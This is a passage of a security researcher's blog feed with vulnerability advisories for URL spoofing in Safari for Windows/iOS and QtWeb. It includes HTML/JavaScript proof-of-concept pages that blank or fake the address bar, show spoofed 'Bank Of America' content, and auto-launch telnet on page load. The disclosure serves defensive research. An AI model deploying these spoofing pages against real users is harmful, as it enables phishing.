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'/><h1></b>Hello !! i'm a Spoofed Site !!!</b></h1></body>");<br />
}<br />
</script><br />
</head><br />
<body onload="invokePoC()"><br />
<h1>Safari for windows 5.1.5 and prior URL pseudo-spoof window.open() test case.</h1><br />
<noscript><p>this testcase requires JavaScript to run.</p></noscript><br />
<p>First Click in this link ==> <a href="http://www.bankofamerica.com/login" onClick="location.reload();" target="_blank">invoke PoC</a></p><br />
<p>and Look in result window, the address bar , show The url and if you write<br />
any url in the address bar, the browser can't navigate to it. This issue can be<br />
used to spoof sites or pishing attacks. Vulnerable Safari for windows 5.1.5 and<br />
prior versions, also Safari for IOS is Too vulnerable.<br />
</body><br />
</html><br />
####################### €Nd ######################<br />
<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-5323521479395191532012-03-23T03:11:00.002-07:002012-04-03T15:32:48.308-07:00Safari for windows and IOS URL weakness<pre>#####################################
Safari for windows and Ios Url Spoof
Vendor URL: http://www.apple.com
Advisore:http://lostmon.blogspot.com/2012/03/safari-for-windows-and-ios-url-weakness.html
Vendor notify: YES PoC available: YES
#####################################
#############
History
#############
Yesterday i read a New about safari for IOS
Url spoof vulnerability at http://iclarified.com/entry/comments.php?enid=20858
I want to clarify that i had report this vulnerabiliy in 12/03/2011 to apple
product security across MSVR. (i had the mails that demostrate it)
So apple Don't patch it and this vuln is one year old.
I had report to a telnet automatic execution in safari for windows...
and <strike>they have patch in silence</strike> ... no credits no info...
THis is the response about telnet execution from apple:
" Issue 1: We do not see any security implications with allowing telnet connections.
There is an existing enhancement request for OS X to provide a warning dialog."
Yes but not in windows and if you doing apps for windows you can't say it does not work in OS X. It works in Safari for windows prior to 5.1.4
Issue 2: URL Spoof
I have found few times a go a RCE in IE 6, 7 and 8 see MS011-57
also it affects to Qtweb browser and safari for windows
i report it to apple and sit quiet and wait till apple patch.
So whats happened?¿ after a year of report he vuln continue working and other
researchers had publish it ( http://majorsecurity.net )
but i like to clarify that i report it to apple one year a go !!!
Response from apple:
"Issue 2: The outside third party you are coordinating with already sent this issue to us on January 10, 2011. It does not appear possible to spoof arbitrary URLs in the address bar (i.e. while the title may say "Bank of America" in the proof-of-concept, you can't spoof the address bar to read https://bankofamerica.com) Given that the most serious impact of this issue is that you can prevent the userfrom using the address bar in the newly created tab, we do not have a timetabletoresolve this issue."
look his PoC / exploit and look my code PoC
His code => http://majorsecurity.net/html5/ios51-demo.html
My code => http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html
this is the similar code that i had report to apple.
Bad Words for apple on security !!!!!!!!!!! and bad work with security researchers :/
################
Sample codes
################
############ BOF Safari.html #################
<html><title>Safari unauth telnet execution by lostmon</title>
<script type="text/javascript" language="javascript">
function redirect() {
location.replace("telnet:192.168.1.1");
}
</script>
<body onLoad="redirect();">
</body>
</html>
############### EOF ################
2- URL Spoof or about:blank spoof
This issue can use to spoof url locations or to show fake content in
without any URL in the address bar
- open the PoC and click in Invoke PoC and look at the address bar, it
does not show any url....(safari2.html)
-open the PoC and click in invokePoC (safari3.html) Look at addressbar
it shows "about:blank" but itn't at about:blank.
and look at the page title :) This can use to spoof content.
############## BOF safari2.html #################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('OWNED OWNED OWNED');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
################# EOF ################################
#################### BOF safari3.html ###################
<html>
<head>
<title>About:blank Url spoofing using document.open() testcase</title>
<script type="text/javascript"><!--
var wx;
function invokePoC() {
wx = open("about:blank","newwin");
setInterval("doit()",1);
}
function doit() {
wx.document.open();
wx.document.write('<html><title>Bank Of America</title>OWNED OWNED
OWNED<br></html>');
}
// -->
</script>
</head>
<body>
<h1>About:blank Url spoofing using document.open() testcase</h1>
<noscript><p>this testcase requires JavaScript to run.</p></noscript>
<p><a href="javascript:invokePoC();">invoke PoC</a></p>
</body>
</html>
##################### EOF ##############################
I would like to thnx MSVR for his preocupation on this issue and for talk about it with apple. MSVR is a Very Good program and they do A VERY GOOD WORK on security !!!!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
</pre><div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-54194734087003927472011-10-03T03:55:00.001-07:002011-10-03T03:57:09.093-07:00QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks#################################################<br />
QTWeb Internet Browser URL weakness lets remote attackers to do Spoof or phishing attacks<br />
Vendor URL: http://www.qtweb.net/<br />
Vendor bugtrack=> http://code.google.com/p/qtweb/issues/detail?id=151<br />
Advisore: http://lostmon.blogspot.com/2011/10/qtweb-internet-browser-url-weakness.html<br />
Vendor notify: YES exploit available: YES<br />
##################################################<br />
<br />
###################<br />
Description By vendor<br />
###################<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
QtWeb Internet Browser - lightweight, secure and portable browser having unique user interface and privacy features. QtWeb is an open source project based on Nokia's Qt framework and Apple's WebKit rendering engine (the same as being used in Apple Safari and Google Chrome).</div>
<br />
######################<br />
Vulnerability Description<br />
######################<br />
<br />
<div style="text-align: left;">
In a normal case when navigate to a site, the browser shows real URL But it has a weakness and a attacker can show a empty URL. This weakness can be used for pishing or spoof attacks because you can think that you are in bank of america for example and the browser don't show nothing in URL:) </div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s1600/qt1.jpg" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzJn5s8fe9D715KjGQuOrrEdEPsjapG2JR8PHbKSZf4Ihu-_tJ4OSZC5-xJpMNIvbqHABPlSjUi-zB0qcAo_IFI7iuswYqtJVliyAcdm8rbo7FxIYBoMYlN-FDWnuEenMIxfCN/s400/qt1.jpg" width="400" /></a></td></tr>
